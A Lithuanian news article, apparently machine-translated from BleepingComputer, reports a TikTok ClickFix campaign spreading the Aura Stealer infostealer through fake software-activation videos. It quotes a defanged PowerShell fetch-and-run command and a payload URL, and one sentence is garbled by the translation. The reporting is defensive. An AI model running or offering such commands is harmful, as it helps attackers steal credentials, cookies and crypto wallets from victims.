Kibernetiniai nusikaltėliai naudoja „TikTok“ vaizdo įrašus, paslėptus kaip nemokamus populiarios programinės įrangos, pvz., „Windows“, „Spotify“ ir „Netflix“, aktyvinimo vadovus, kad platintų informaciją vagiančias kenkėjiškas programas.
ISC prižiūrėtojas Xavier Mertens pastebėjo vykstančią kampaniją, kuri iš esmės yra tokia pati, kaip ir tą, kurią gegužės mėnesį stebėjo Trend Micro.
„BleepingComputer“ matomi „TikTok“ vaizdo įrašai apsimeta, kad pateikia instrukcijas, kaip suaktyvinti teisėtus produktus, tokius kaip „Windows“, „Microsoft 365“, „Adobe Premiere“, „Photoshop“, „CapCut Pro“ ir „Discord Nitro“, taip pat sukurtas paslaugas, tokias kaip „Netflix“ ir „Spotify Premium“.
Šaltinis: BleepingComputer.com
Vaizdo įrašuose vykdoma „ClickFix“ ataka, kuri yra socialinės inžinerijos technika, suteikianti, atrodo, teisėtus „pataisymus“ arba instrukcijas, kurios verčia vartotojus vykdyti kenkėjiškas „PowerShell“ komandas ar kitus scenarijus, užkrečiančius jų kompiuterius kenkėjiška programa.
Kiekviename vaizdo įraše rodoma trumpa vienos eilutės komanda ir žiūrovams nurodoma paleisti ją kaip „PowerShell“ administratorių:
iex (irm slmgr(.)win/photoshop)Reikėtų pažymėti, kad programos pavadinimas URL URL skiriasi priklausomai nuo programos, kuria apsimetinėjama. Pavyzdžiui, netikruose „Windows“ aktyvinimo vaizdo įrašuose, o ne URL, kuriame yra fotošoputai apimtų langai.
Šioje kampanijoje, kai vykdoma komanda, „PowerShell“ prisijungia prie nuotolinės svetainės slmgr(.)win, kad gautų ir vykdytų kitą „PowerShell“ scenarijų.
Šis scenarijus atsisiunčia du vykdomuosius failus iš „Cloudflare“ puslapių, o pirmasis vykdomasis failas atsisiunčiamas iš https://file-epq(.)pages(.)dev/updater.exe (VirusTotal). Šis vykdomasis failas yra informacijos vagystės kenkėjiškos programos „Aura Stealer“ variantas.
„Aura Stealer“ renka išsaugotus kredencialus iš naršyklių, autentifikavimo slapukus, kriptovaliutų pinigines ir kredencialus iš kitų programų ir įkelia juos užpuolikams, suteikdama jiems prieigą prie jūsų paskyrų.
Mertensas sako, kad bus atsisiųsta papildoma naudingoji apkrova, pavadinta source.exe (VirusTotal), kuri naudojama savarankiškai kompiliuoti kodui naudojant .NET integruotą Visual C# kompiliatorių (csc.exe). Tada šis kodas įšvirkščiamas ir paleidžiamas atmintyje.
Papildomo krovinio paskirtis lieka neaiški.
Naudotojai, atliekantys šiuos veiksmus, turėtų manyti, kad visi jų kredencialai yra pažeisti, ir nedelsiant iš naujo nustatyti slaptažodžius visose lankomose svetainėse.
Per pastaruosius metus labai išpopuliarėjo „ClickFix“ atakos, naudojamos įvairioms kenkėjiškoms programoms platinti vykdant „ransomware“ ir kriptovaliutų vagysčių kampanijas.
Paprastai vartotojai niekada neturėtų kopijuoti teksto iš svetainės ir paleisti jo operacinės sistemos dialogo lange, įskaitant „File Explorer“ adreso juostą, komandų eilutę, „PowerShell“ raginimus, „MacOS“ terminalą ir „Linux“ apvalkalus.
46 % aplinkų slaptažodžiai buvo nulaužti, beveik dvigubai daugiau nei 25 % praėjusiais metais.
Gaukite „Picus Blue Report 2025“ dabar, kad išsamiai apžvelgtumėte daugiau išvadų apie prevencijos, aptikimo ir duomenų išfiltravimo tendencijas.
